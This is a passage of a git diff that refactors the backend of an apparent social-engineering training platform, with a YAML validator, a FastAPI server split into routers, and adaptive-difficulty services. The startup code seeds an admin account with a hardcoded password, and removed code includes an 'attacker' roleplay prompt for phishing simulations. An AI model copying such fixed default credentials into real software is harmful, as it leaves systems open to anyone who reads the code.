Sintaks YAML tidak valid.") + print( + f"โŒ Error: Gagal mem-parsing file YAML " + f"'{yaml_file_path.name}'. Sintaks YAML tidak valid." + ) print(f"Detail: {e}") sys.exit(1) # 1. Tentukan Tipe dan Skema - yaml_type = data.get('type') - - if yaml_type == 'challenge': + yaml_type = data.get("type") + + if yaml_type == "challenge": schema = load_schema(CHALLENGE_SCHEMA_PATH) schema_name = "Challenge" - elif yaml_type == 'quiz': + elif yaml_type == "quiz": schema = load_schema(QUIZ_SCHEMA_PATH) schema_name = "Quiz" else: - print(f"โŒ Error: File '{yaml_file_path.name}' tidak memiliki field 'type' atau nilainya bukan 'challenge' atau 'quiz'.") + print( + f"โŒ Error: File '{yaml_file_path.name}' tidak memiliki " + f"field 'type' atau nilainya bukan 'challenge' atau 'quiz'." + ) sys.exit(1) print(f"๐Ÿ” Memvalidasi file '{yaml_file_path.name}' sebagai tipe '{schema_name}'...") @@ -53,9 +62,9 @@ def validate_yaml_file(yaml_file_path: Path): # 2. Jalankan Validasi Skema try: validate(instance=data, schema=schema) - + # 3. 
Validasi Tambahan (Cross-field logic - Challenge) - if yaml_type == 'challenge': + if yaml_type == "challenge": validate_challenge_nodes(data) print(f"\nโœ… VALIDASI BERHASIL untuk '{yaml_file_path.name}'!") @@ -69,7 +78,7 @@ def validate_yaml_file(yaml_file_path: Path): # Menampilkan path yang jelas ke properti yang bermasalah path_segments = [str(p) for p in e.absolute_path] error_path = ".".join(path_segments) if path_segments else "[root]" - + print(f"Path Bermasalah: {error_path}") print(f"Pesan Error: {e.message}") print("-" * 30) @@ -82,32 +91,36 @@ def validate_yaml_file(yaml_file_path: Path): def validate_challenge_nodes(data): """Memeriksa konsistensi ID node dan NEXT pointer untuk tantangan.""" - node_ids = {node['id'] for node in data['nodes']} - + node_ids = {node["id"] for node in data["nodes"]} + # Kumpulkan semua target 'next' yang ada di opsi dan node target_ids = set() - for node in data['nodes']: + for node in data["nodes"]: # Ambil 'next' dari node (untuk message node) - if 'next' in node: - target_ids.add(node['next']) - + if "next" in node: + target_ids.add(node["next"]) + # Ambil 'next' dari opsi (untuk question node) - if node.get('type') == 'question' and 'options' in node: - for option in node['options']: - if 'next' in option: - target_ids.add(option['next']) + if node.get("type") == "question" and "options" in node: + for option in node["options"]: + if "next" in option: + target_ids.add(option["next"]) # Pastikan semua target 'next' menunjuk ke ID node yang valid for target_id in target_ids: if target_id not in node_ids: - raise Exception(f"Referensi node tidak valid: 'next' menunjuk ke ID '{target_id}', yang tidak ada di daftar node ID.") + raise Exception( + f"Referensi node tidak valid: 'next' menunjuk " + f"ke ID '{target_id}', yang tidak ada di " + f"daftar node ID." 
+ ) # Pastikan ada node 'start' - if 'start' not in node_ids: + if "start" not in node_ids: raise Exception("Node 'start' (ID: 'start') wajib ada sebagai titik masuk.") # Pastikan tidak ada loop tertutup (pemeriksaan sederhana: node 'end' harus ada) - end_nodes = [node for node in data['nodes'] if node.get('type') == 'end'] + end_nodes = [node for node in data["nodes"] if node.get("type") == "end"] if not end_nodes: raise Exception("Setidaknya satu node bertipe 'end' wajib ada.") @@ -116,6 +129,6 @@ def validate_challenge_nodes(data): if len(sys.argv) < 2: print("Usage: python validate_yaml.py ") sys.exit(1) - + yaml_path = Path(sys.argv[1]) - validate_yaml_file(yaml_path) \ No newline at end of file + validate_yaml_file(yaml_path) diff --git a/backend/server.py b/backend/server.py index 087d9d6..b4a0f3a 100644 --- a/backend/server.py +++ b/backend/server.py @@ -1,708 +1,181 @@ -from fastapi import FastAPI, APIRouter, HTTPException, Depends, status -from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials -from fastapi.responses import FileResponse, StreamingResponse -from dotenv import load_dotenv -from starlette.middleware.cors import CORSMiddleware -from motor.motor_asyncio import AsyncIOMotorClient -import os import logging -from pathlib import Path -from pydantic import BaseModel, Field, ConfigDict -from typing import List, Optional, Dict, Any +import os import uuid -from datetime import datetime, timezone, timedelta -import bcrypt -import jwt -import yaml -import re -from io import BytesIO -import json - -# ROOT_DIR = Path(__file__).parent -load_dotenv() - -# MongoDB connection -mongo_url = os.environ['MONGO_URL'] -client = AsyncIOMotorClient(mongo_url) -db = client[os.environ['DB_NAME']] - -# Create the main app without a prefix -app = FastAPI(title="Pretexta API") - -# Create a router with the /api prefix -api_router = APIRouter(prefix="/api") +from contextlib import asynccontextmanager +from datetime import UTC, datetime +from pathlib import 
Path -# JWT Configuration -JWT_SECRET = os.environ.get('JWT_SECRET', 'soceng-lab-secret-key-change-in-production') -JWT_ALGORITHM = "HS256" -JWT_EXPIRATION_HOURS = 24 +import yaml +from fastapi import APIRouter, FastAPI +from starlette.middleware.cors import CORSMiddleware -security = HTTPBearer() +from middleware.rate_limit import RateLimitMiddleware +from models.schemas import User +from routes import ( + adaptive_router, + analytics_router, + auth_router, + campaigns_router, + certificates_router, + challenges_router, + debrief_router, + imports_router, + leaderboard_router, + llm_router, + notifications_router, + organizations_router, + quizzes_router, + reports_router, + scenario_builder_router, + settings_router, + simulations_router, + webhooks_router, +) +from services.auth import hash_password +from services.database import db # Configure logging logging.basicConfig( level=logging.INFO, - format='%(asctime)s - %(name)s - %(levelname)s - %(message)s' + format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", ) logger = logging.getLogger(__name__) -# ==================== MODELS ==================== -class User(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - username: str - password_hash: str - created_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) - is_active: bool = True - -class LoginRequest(BaseModel): - username: str - password: str - -class LoginResponse(BaseModel): - token: str - user: Dict[str, Any] - -class Challenge(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - title: str - description: str - difficulty: str # easy, medium, hard - cialdini_categories: List[str] - estimated_time: int # minutes - nodes: List[Dict[str, Any]] - metadata: Dict[str, Any] = Field(default_factory=dict) - content_en: Optional[Dict[str, Any]] = None - content_id: Optional[Dict[str, Any]] = None - 
created_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) +async def auto_import_yaml(db): + """Auto-import YAML sample data on first run.""" + data_dirs = [ + Path("/app/data/sample"), + Path("/app/data/professionals"), + Path("data/sample"), + Path("data/professionals"), + ] + total = 0 + for data_dir in data_dirs: + if not data_dir.exists(): + continue + for yaml_file in sorted(data_dir.glob("*.yaml")): + try: + with open(yaml_file, encoding="utf-8") as f: + data = yaml.safe_load(f) + yaml_type = data.get("type") + if not yaml_type: + continue + data["id"] = str(uuid.uuid4()) + data["created_at"] = datetime.now(UTC).isoformat() + if yaml_type == "challenge": + await db.challenges.insert_one(data) + elif yaml_type == "quiz": + await db.quizzes.insert_one(data) + else: + continue + total += 1 + logger.info(f" Imported: {data.get('title', yaml_file.name)}") + except Exception as e: + logger.warning(f" Failed to import {yaml_file.name}: {e}") + logger.info(f"Auto-import complete: {total} items loaded") + + +@asynccontextmanager +async def lifespan(app: FastAPI): + """Application startup and shutdown events.""" + # Startup: seed default admin user + existing_user = await db.users.find_one({"username": "soceng"}) + if not existing_user: + seed_user = User( + username="soceng", + password_hash=hash_password("Cialdini@2025!"), + display_name="Admin", + role="admin", + ) + doc = seed_user.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.users.insert_one(doc) + logger.info("Seed admin user created: soceng") -class Quiz(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - title: str - description: str - difficulty: str - cialdini_categories: List[str] - questions: List[Dict[str, Any]] - content_en: Optional[Dict[str, Any]] = None - content_id: Optional[Dict[str, Any]] = None - created_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) + 
# Ensure indexes + await db.users.create_index("username", unique=True) + await db.organizations.create_index("invite_code", unique=True, sparse=True) + await db.notifications.create_index([("user_id", 1), ("read", 1)]) + await db.simulations.create_index([("user_id", 1), ("status", 1)]) + await db.campaign_progress.create_index([("campaign_id", 1), ("user_id", 1)]) -class Simulation(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - challenge_id: Optional[str] = None - quiz_id: Optional[str] = None - simulation_type: str # challenge, quiz, ai_challenge - status: str # running, completed, paused - events: List[Dict[str, Any]] = Field(default_factory=list) - score: Optional[float] = None - started_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) - completed_at: Optional[datetime] = None - participant_name: Optional[str] = None - title: Optional[str] = None # Added for log display - - # AI Challenge specific fields - type: Optional[str] = None # For backwards compatibility, same as simulation_type - challenge_type: Optional[str] = None # comprehensive, email_analysis, interactive, scenario - category: Optional[str] = None # phishing, pretexting, baiting, etc. 
- difficulty: Optional[str] = None # beginner, intermediate, advanced - total_questions: Optional[int] = None - correct_answers: Optional[int] = None - answers: Optional[Dict[str, Any]] = None - challenge_data: Optional[Dict[str, Any]] = None + # Auto-import sample data if database is empty + challenge_count = await db.challenges.count_documents({}) + quiz_count = await db.quizzes.count_documents({}) + if challenge_count == 0 and quiz_count == 0: + logger.info("Empty database detected โ€” auto-importing sample data...") + await auto_import_yaml(db) -class LLMConfig(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - provider: str # openai, gemini, claude, generic - api_key: str # encrypted - model_name: Optional[str] = None - enabled: bool = False - rate_limit: int = 100 # per hour - updated_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) + # Warn about default JWT secret + jwt_secret = os.environ.get("JWT_SECRET", "") + if not jwt_secret or jwt_secret == "change-this-secret-key-in-production": + logger.warning("WARNING: Using default JWT secret. 
Set JWT_SECRET env var in production!") -class Settings(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = "settings" - language: str = "en" - theme: str = "dark" - first_run_completed: bool = False - llm_enabled: bool = False - reduce_motion: bool = False + yield -# ==================== AUTH HELPERS ==================== + # Shutdown + from services.database import client -def hash_password(password: str) -> str: - return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt()).decode('utf-8') + client.close() -def verify_password(password: str, password_hash: str) -> bool: - return bcrypt.checkpw(password.encode('utf-8'), password_hash.encode('utf-8')) -def create_token(user_id: str) -> str: - expiration = datetime.now(timezone.utc) + timedelta(hours=JWT_EXPIRATION_HOURS) - payload = { - "user_id": user_id, - "exp": expiration - } - return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM) +# Create the app +app = FastAPI( + title="Pretexta API", + description="Social Engineering Simulation Lab API", + version="2.0.0", + lifespan=lifespan, +) -async def get_current_user(credentials: HTTPAuthorizationCredentials = Depends(security)) -> User: - try: - token = credentials.credentials - payload = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM]) - user_id = payload.get("user_id") - - user_doc = await db.users.find_one({"id": user_id}, {"_id": 0}) - if not user_doc: - raise HTTPException(status_code=401, detail="User not found") - - return User(**user_doc) - except jwt.ExpiredSignatureError: - raise HTTPException(status_code=401, detail="Token expired") - except Exception as e: - raise HTTPException(status_code=401, detail="Invalid token") +# API router with /api prefix +api_router = APIRouter(prefix="/api") -# ==================== ROUTES ==================== @api_router.get("/") async def root(): - return {"message": "Pretexta API", "version": "1.0.0"} - -# Auth Routes -@api_router.post("/auth/login", response_model=LoginResponse) 
-async def login(request: LoginRequest): - user_doc = await db.users.find_one({"username": request.username}, {"_id": 0}) - - if not user_doc or not verify_password(request.password, user_doc['password_hash']): - raise HTTPException(status_code=401, detail="Invalid credentials") - - user = User(**user_doc) - token = create_token(user.id) - - return LoginResponse( - token=token, - user={ - "id": user.id, - "username": user.username, - "created_at": user.created_at.isoformat() - } - ) - -@api_router.get("/auth/me") -async def get_me(current_user: User = Depends(get_current_user)): - return { - "id": current_user.id, - "username": current_user.username, - "created_at": current_user.created_at.isoformat() - } - -# Challenge Routes -@api_router.get("/challenges", response_model=List[Challenge]) -async def get_challenges(current_user: User = Depends(get_current_user)): - challenges = await db.challenges.find({}, {"_id": 0}).to_list(1000) - return challenges - -@api_router.get("/challenges/{challenge_id}", response_model=Challenge) -async def get_challenge(challenge_id: str, current_user: User = Depends(get_current_user)): - challenge = await db.challenges.find_one({"id": challenge_id}, {"_id": 0}) - if not challenge: - raise HTTPException(status_code=404, detail="Challenge not found") - return challenge - -@api_router.post("/challenges", response_model=Challenge) -async def create_challenge(challenge: Challenge, current_user: User = Depends(get_current_user)): - doc = challenge.model_dump() - doc['created_at'] = doc['created_at'].isoformat() - await db.challenges.insert_one(doc) - return challenge - -# Quiz Routes -@api_router.get("/quizzes", response_model=List[Quiz]) -async def get_quizzes(current_user: User = Depends(get_current_user)): - quizzes = await db.quizzes.find({}, {"_id": 0}).to_list(1000) - return quizzes + return {"message": "Pretexta API", "version": "2.0.0"} -@api_router.get("/quizzes/{quiz_id}", response_model=Quiz) -async def get_quiz(quiz_id: str, 
current_user: User = Depends(get_current_user)): - quiz = await db.quizzes.find_one({"id": quiz_id}, {"_id": 0}) - if not quiz: - raise HTTPException(status_code=404, detail="Quiz not found") - return quiz -# Simulation Routes -@api_router.post("/simulations") -async def create_simulation(simulation: Simulation, current_user: User = Depends(get_current_user)): - doc = simulation.model_dump() - doc['started_at'] = doc['started_at'].isoformat() - if doc.get('completed_at'): - doc['completed_at'] = doc['completed_at'].isoformat() - await db.simulations.insert_one(doc) - return {"id": simulation.id, "status": "created"} - -@api_router.get("/simulations", response_model=List[Simulation]) -async def get_simulations(current_user: User = Depends(get_current_user)): - sims = await db.simulations.find({}, {"_id": 0}).sort("started_at", -1).to_list(100) - return sims - -@api_router.get("/simulations/{simulation_id}", response_model=Simulation) -async def get_simulation(simulation_id: str, current_user: User = Depends(get_current_user)): - sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) - if not sim: - raise HTTPException(status_code=404, detail="Simulation not found") - return sim - -@api_router.put("/simulations/{simulation_id}") -async def update_simulation(simulation_id: str, updates: Dict[str, Any], current_user: User = Depends(get_current_user)): - if updates.get('completed_at'): - updates['completed_at'] = datetime.now(timezone.utc).isoformat() - - result = await db.simulations.update_one( - {"id": simulation_id}, - {"$set": updates} - ) - - if result.matched_count == 0: - raise HTTPException(status_code=404, detail="Simulation not found") - - return {"message": "Simulation updated"} - -@api_router.delete("/simulations/{simulation_id}") -async def delete_simulation(simulation_id: str, current_user: User = Depends(get_current_user)): - result = await db.simulations.delete_one({"id": simulation_id}) - - if result.deleted_count == 0: - raise 
HTTPException(status_code=404, detail="Simulation not found") - - return {"message": "Simulation deleted successfully"} - -# LLM Config Routes -@api_router.get("/llm/config") -async def get_llm_configs(current_user: User = Depends(get_current_user)): - configs = await db.llm_configs.find({}, {"_id": 0}).to_list(100) - # Filter and mask configs - active_configs = [] - for config in configs: - # Skip configs with empty or no API key - if not config.get('api_key') or config.get('api_key') == '': - continue - # Mask actual API keys from response (security) - config['api_key'] = '***' - config['updated_at'] = config.get('updated_at', datetime.now(timezone.utc).isoformat()) - active_configs.append(config) - return active_configs - -@api_router.post("/llm/config") -async def save_llm_config(config: LLMConfig, current_user: User = Depends(get_current_user)): - doc = config.model_dump() - doc['updated_at'] = doc['updated_at'].isoformat() - - # If API key is empty, delete the config (revoke) - if not config.api_key or config.api_key == '': - await db.llm_configs.delete_one({"provider": config.provider}) - return {"message": "LLM config deleted"} - - # Update or insert - await db.llm_configs.update_one( - {"provider": config.provider}, - {"$set": doc}, - upsert=True - ) - - return {"message": "LLM config saved"} - -@api_router.post("/llm/generate") -async def generate_pretext(request: Dict[str, Any], current_user: User = Depends(get_current_user)): - """Generate pretext using LLM""" - requested_provider = request.get('provider', None) - prompt = request.get('prompt', '') - context = request.get('context', {}) - - # Get LLM config - use requested provider or first enabled one - if requested_provider: - config = await db.llm_configs.find_one({"provider": requested_provider, "enabled": True}, {"_id": 0}) - else: - config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) - - if not config: - raise HTTPException(status_code=400, detail="LLM provider not configured or 
not enabled. Please configure in Settings.") - - provider = config['provider'] - - # Import langchain chat models - from langchain_openai import ChatOpenAI - from langchain_google_genai import ChatGoogleGenerativeAI - from langchain_anthropic import ChatAnthropic - from langchain_core.messages import HumanMessage, SystemMessage - - # Set model based on provider - model_map = { - "gemini": "gemini-1.5-flash", - "claude": "claude-3-5-sonnet-20240620" - } - - # Priority: Configured Model -> Provider Default -> Fallback - model_name = config.get('model_name') or model_map.get(provider) - if not model_name: - model_name = "gemini-1.5-flash" - - - # Create the appropriate chat model based on provider - try: - if provider == "gemini": - # Gemini Model Fallback Strategy - # Some keys/regions don't support 1.5-flash yet, or require 'models/' prefix - model_candidates = [ - model_name, # configured default (e.g. gemini-1.5-flash) - "gemini-1.5-flash", # explicit preferred - "models/gemini-1.5-flash", # prefix variation - "gemini-pro", # old reliable fallback - "models/gemini-pro" - ] - - # Deduplicate preserving order - model_candidates = list(dict.fromkeys(model_candidates)) - - last_error = None - response = None - - for candidate in model_candidates: - try: - logger.info(f"Attempting Gemini generation with model: {candidate}") - chat_model = ChatGoogleGenerativeAI( - google_api_key=config['api_key'], - model=candidate, - temperature=0.7, - convert_system_message_to_human=True - ) - - # Prepare messages - context_str = json.dumps(context, indent=2) if isinstance(context, dict) else str(context) - system_message = SystemMessage(content="You are a social engineering pretext generator. Generate realistic, ethically-sound pretexts for security awareness training. 
Always mark outputs as training material.\n\nContext: " + context_str + "\n\n") - user_message = HumanMessage(content=prompt) - - response = await chat_model.ainvoke([system_message, user_message]) - if response: - break # Success! - except Exception as e: - logger.warning(f"Failed with model {candidate}: {str(e)}") - last_error = e - - if not response: - raise last_error or Exception("All Gemini models failed") - - elif provider == "claude": - chat_model = ChatAnthropic( - api_key=config['api_key'], - model=model_name, - temperature=0.7 - ) - # Standard invocation for Claude - context_str = json.dumps(context, indent=2) if isinstance(context, dict) else str(context) - system_message = SystemMessage(content="You are a social engineering pretext generator. Generate realistic, ethically-sound pretexts for security awareness training. Always mark outputs as training material.\n\nContext: " + context_str + "\n\n") - user_message = HumanMessage(content=prompt) - response = await chat_model.ainvoke([system_message, user_message]) - - else: - raise HTTPException(status_code=400, detail=f"Unsupported provider: {provider}") - - # Sanitize output (remove PII) - sanitized = repair_json(response.content) - - return {"generated_text": sanitized, "provider": provider} - - except Exception as e: - logger.error(f"LLM generation failed: {str(e)}") - # Return a clearer error to the frontend - error_msg = str(e) - if "NOT_FOUND" in error_msg: - error_msg = "Model not found. Your API Key might not support the selected model, or the region is restricted." 
- raise HTTPException(status_code=500, detail=f"LLM Generation Error: {error_msg}") - - # Remove markdown code blocks if present - text = re.sub(r'```(?:json)?', '', text) - text = text.replace('```', '') - - # Remove training markers - text = text.replace('\\[TRAINING\\]', '').replace('\\[TRAINING MATERIAL\\]', '') - - return text.strip() - -@api_router.post("/llm/chat") -async def chat_interaction(request: Dict[str, Any], current_user: User = Depends(get_current_user)): - """Real-time Chat Interaction for Roleplay""" - history = request.get('history', []) - persona = request.get('persona', {}) - user_message = request.get('message', '') - - # Get Config - config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) - if not config: - raise HTTPException(status_code=400, detail="LLM config missing") - - provider = config['provider'] - api_key = config['api_key'] - - from langchain_core.messages import HumanMessage, SystemMessage, AIMessage - from langchain_google_genai import ChatGoogleGenerativeAI - from langchain_anthropic import ChatAnthropic - - # Construct System Prompt - system_prompt = f"""You are a roleplay actor in a cybersecurity simulation. - Role: {persona.get('name', 'Attacker')} - Goal: {persona.get('goal', 'Trick the user')} - Personality: {persona.get('style', 'Manipulative')} - Context: {persona.get('context', 'Corporate Environment')} - - INSTRUCTIONS: - 1. Respond naturally as your character. Short, realistic messages (whatsapp/email style). - 2. Do NOT break character. - 3. If the user successfully spots the attack or refuses securely, react accordingly (e.g. get angry, give up, or try a different angle). - 4. If the user FAILS (gives password, clicks link), output a special marker in your text: [SUCCESS_ATTACK]. - 5. If the user permanently BLOCKS the attack, output: [ATTACK_FAILED]. 
- """ - - messages = [SystemMessage(content=system_prompt)] - - # Reconstruct history - for msg in history: - if msg['role'] == 'user': - messages.append(HumanMessage(content=msg['content'])) - elif msg['role'] == 'assistant': - messages.append(AIMessage(content=msg['content'])) - - # Add current message - messages.append(HumanMessage(content=user_message)) - - response = None - last_error = None - error_logs = [] - - try: - if provider == "groq": - # Groq Logic (Fast & Free Tier) - from langchain_groq import ChatGroq - chat = ChatGroq( - api_key=api_key, - model_name="llama-3.3-70b-versatile", # High quality default - temperature=0.7 - ) - response = await chat.ainvoke(messages) - - elif provider == "gemini": - # Gemini Model Fallback Strategy - # Simplified fallback - model_candidates = ["gemini-1.5-flash", "gemini-pro"] - - for candidate in model_candidates: - try: - logger.info(f"Chat attempt with model: {candidate}") - convert_system = "1.5" not in candidate - - chat = ChatGoogleGenerativeAI( - google_api_key=api_key, - model=candidate, - temperature=0.8, - convert_system_message_to_human=convert_system - ) - - # Timeout protection - import asyncio - try: - response = await asyncio.wait_for(chat.ainvoke(messages), timeout=15.0) - except asyncio.TimeoutError: - raise Exception("Request timed out") - - if response: - logger.info(f"Chat success with model: {candidate}") - break - except Exception as e: - logger.warning(f"Chat failed with model {candidate}: {e}") - last_error = e - - if not response: - raise Exception(f"Gemini failed: {last_error}") - - elif provider == "claude": - chat = ChatAnthropic(api_key=api_key, model="claude-3-5-sonnet-20240620") - response = await chat.ainvoke(messages) - - else: - # Default to Groq if unknown, assuming user has groq key - from langchain_groq import ChatGroq - chat = ChatGroq(api_key=api_key, model_name="llama3-70b-8192") - response = await chat.ainvoke(messages) - - content = response.content - - status = "ongoing" - if 
"[SUCCESS_ATTACK]" in content: - status = "failed" # User failed the test - content = content.replace("[SUCCESS_ATTACK]", "") - elif "[ATTACK_FAILED]" in content: - status = "completed" # User passed - content = content.replace("[ATTACK_FAILED]", "") - - return { - "role": "assistant", - "content": content, - "status": status - } - - except Exception as e: - logger.error(f"Chat error: {e}") - error_msg = str(e) - if "401" in error_msg: - error_msg = f"Unauthorized. Please check your API Key for {provider}." - elif "404" in error_msg: - error_msg = f"Model Not Found. Provider: {provider}." - elif "429" in error_msg: - error_msg = f"Rate Limit Exceeded. Please try again later. Provider: {provider}." - - raise HTTPException(status_code=500, detail=error_msg) - -def repair_json(text: str) -> str: - """Attempt to repair and extract valid JSON from LLM output""" - text = sanitize_llm_output(text) - - # Try to find JSON object - start = text.find('{') - end = text.rfind('}') - - if start != -1 and end != -1: - text = text[start:end+1] - +@api_router.get("/health") +async def health_check(): + """Health check endpoint for Docker and monitoring.""" try: - # Validate if it's already good - json.loads(text) - return text - except json.JSONDecodeError: - # Simple repairs - # 1. Replace single quotes with double quotes (imperfect but helps) - # text = text.replace("'", '"') - # CAUTION: This might break text content. Only use if desperate. 
- pass - - return text - -# Settings Routes -@api_router.get("/settings", response_model=Settings) -async def get_settings(current_user: User = Depends(get_current_user)): - settings = await db.settings.find_one({"id": "settings"}, {"_id": 0}) - if not settings: - settings = Settings().model_dump() - await db.settings.insert_one(settings) - return settings + await db.command("ping") + return {"status": "healthy", "database": "connected"} + except Exception: + return {"status": "degraded", "database": "disconnected"} + + +# Register all route modules +api_router.include_router(auth_router) +api_router.include_router(challenges_router) +api_router.include_router(quizzes_router) +api_router.include_router(simulations_router) +api_router.include_router(llm_router) +api_router.include_router(settings_router) +api_router.include_router(imports_router) +api_router.include_router(reports_router) +api_router.include_router(leaderboard_router) +api_router.include_router(analytics_router) +api_router.include_router(organizations_router) +api_router.include_router(campaigns_router) +api_router.include_router(notifications_router) +api_router.include_router(webhooks_router) +api_router.include_router(scenario_builder_router) +api_router.include_router(debrief_router) +api_router.include_router(certificates_router) +api_router.include_router(adaptive_router) -@api_router.put("/settings") -async def update_settings(updates: Dict[str, Any], current_user: User = Depends(get_current_user)): - await db.settings.update_one( - {"id": "settings"}, - {"$set": updates}, - upsert=True - ) - return {"message": "Settings updated"} - -# YAML Import Route -@api_router.post("/import/yaml") -async def import_yaml_file(file_content: Dict[str, Any], current_user: User = Depends(get_current_user)): - """Import YAML challenge or quiz""" - try: - yaml_type = file_content.get('type') - data = file_content.get('data') - - if yaml_type == 'challenge': - challenge = Challenge(**data) - doc = 
challenge.model_dump() - doc['created_at'] = doc['created_at'].isoformat() - await db.challenges.insert_one(doc) - return {"message": "Challenge imported", "id": challenge.id} - - elif yaml_type == 'quiz': - quiz = Quiz(**data) - doc = quiz.model_dump() - doc['created_at'] = doc['created_at'].isoformat() - await db.quizzes.insert_one(doc) - return {"message": "Quiz imported", "id": quiz.id} - - else: - raise HTTPException(status_code=400, detail="Unknown YAML type") - - except Exception as e: - raise HTTPException(status_code=400, detail=f"Import failed: {str(e)}") - -# Report Generation Route -@api_router.get("/reports/{simulation_id}/json") -async def get_report_json(simulation_id: str, current_user: User = Depends(get_current_user)): - sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) - if not sim: - raise HTTPException(status_code=404, detail="Simulation not found") - - # Calculate detailed score - score_data = calculate_susceptibility_score(sim) - - report = { - "simulation_id": simulation_id, - "score": score_data, - "events": sim.get('events', []), - "started_at": sim.get('started_at'), - "completed_at": sim.get('completed_at'), - "participant_name": sim.get('participant_name') - } - - return report - -def calculate_susceptibility_score(simulation: Dict[str, Any]) -> Dict[str, Any]: - """Calculate susceptibility score 0-100""" - events = simulation.get('events', []) - - if not events: - return {"total": 0, "breakdown": {}} - - # Simple scoring logic - compliance_count = sum(1 for e in events if e.get('action') == 'complied') - total_events = len(events) - - # Lower score = more susceptible - base_score = max(0, 100 - (compliance_count / total_events * 100)) if total_events > 0 else 50 - - return { - "total": round(base_score, 2), - "breakdown": { - "compliance_rate": round((compliance_count / total_events * 100) if total_events > 0 else 0, 2), - "total_events": total_events - } - } - -# Include the router in the main app 
app.include_router(api_router) +# Middleware (order matters: last added = first executed) app.add_middleware( CORSMiddleware, allow_credentials=True, - allow_origins=os.environ.get('CORS_ORIGINS', '*').split(','), + allow_origins=os.environ.get("CORS_ORIGINS", "http://localhost:3000").split(","), allow_methods=["*"], allow_headers=["*"], ) -@app.on_event("startup") -async def startup_db(): - """Initialize database with seed user""" - # Check if seed user exists - existing_user = await db.users.find_one({"username": "soceng"}) - - if not existing_user: - seed_user = User( - username="soceng", - password_hash=hash_password("Cialdini@2025!") - ) - doc = seed_user.model_dump() - doc['created_at'] = doc['created_at'].isoformat() - await db.users.insert_one(doc) - logger.info("Seed user created: soceng / Cialdini@2025!") - -@app.on_event("shutdown") -async def shutdown_db_client(): - client.close() +app.add_middleware(RateLimitMiddleware, max_attempts=10, window_seconds=300) diff --git a/backend/services/__init__.py b/backend/services/__init__.py new file mode 100644 index 0000000..db9f487 --- /dev/null +++ b/backend/services/__init__.py @@ -0,0 +1,27 @@ +from services.adaptive import get_recommended_categories, get_recommended_difficulty +from services.auth import create_token, get_current_user, hash_password, verify_password +from services.gamification import BADGE_DEFINITIONS, award_xp, check_simulation_badges +from services.llm import ( + get_llm_chat_model, + get_llm_generate_model, + repair_json, + sanitize_llm_output, +) +from services.scoring import calculate_susceptibility_score + +__all__ = [ + "hash_password", + "verify_password", + "create_token", + "get_current_user", + "get_llm_chat_model", + "get_llm_generate_model", + "sanitize_llm_output", + "repair_json", + "calculate_susceptibility_score", + "award_xp", + "check_simulation_badges", + "BADGE_DEFINITIONS", + "get_recommended_difficulty", + "get_recommended_categories", +] diff --git 
a/backend/services/adaptive.py b/backend/services/adaptive.py new file mode 100644 index 0000000..d2ca737 --- /dev/null +++ b/backend/services/adaptive.py @@ -0,0 +1,141 @@ +import logging + +from services.database import db + +logger = logging.getLogger(__name__) + +# Difficulty scaling rules +DIFFICULTY_ORDER = ["easy", "medium", "hard"] + + +async def get_recommended_difficulty(user_id: str) -> str: + """Calculate recommended difficulty based on user performance.""" + sims = ( + await db.simulations.find( + {"user_id": user_id, "status": "completed"}, + {"_id": 0, "score": 1, "difficulty": 1, "started_at": 1}, + ) + .sort("started_at", -1) + .to_list(10) + ) + + if not sims or len(sims) < 3: + return "easy" + + # Look at last 5 simulations + recent = sims[:5] + recent_scores = [s.get("score", 50) or 50 for s in recent] + avg_score = sum(recent_scores) / len(recent_scores) + + current_difficulty = recent[0].get("difficulty", "medium") + current_idx = ( + DIFFICULTY_ORDER.index(current_difficulty) if current_difficulty in DIFFICULTY_ORDER else 1 + ) + + # Escalate if consistently scoring high + if avg_score >= 85 and current_idx < len(DIFFICULTY_ORDER) - 1: + return DIFFICULTY_ORDER[current_idx + 1] + # De-escalate if struggling + elif avg_score < 40 and current_idx > 0: + return DIFFICULTY_ORDER[current_idx - 1] + + return current_difficulty + + +async def get_recommended_categories(user_id: str) -> list: + """Suggest Cialdini categories the user needs to practice.""" + sims = await db.simulations.find( + {"user_id": user_id, "status": "completed"}, + {"_id": 0, "score": 1, "challenge_data": 1}, + ).to_list(100) + + category_scores = {} + category_counts = {} + + for sim in sims: + categories = sim.get("challenge_data", {}).get("cialdini_categories", []) + score = sim.get("score", 50) or 50 + for cat in categories: + category_scores.setdefault(cat, []).append(score) + category_counts[cat] = category_counts.get(cat, 0) + 1 + + # Find weak areas (lowest avg scores) 
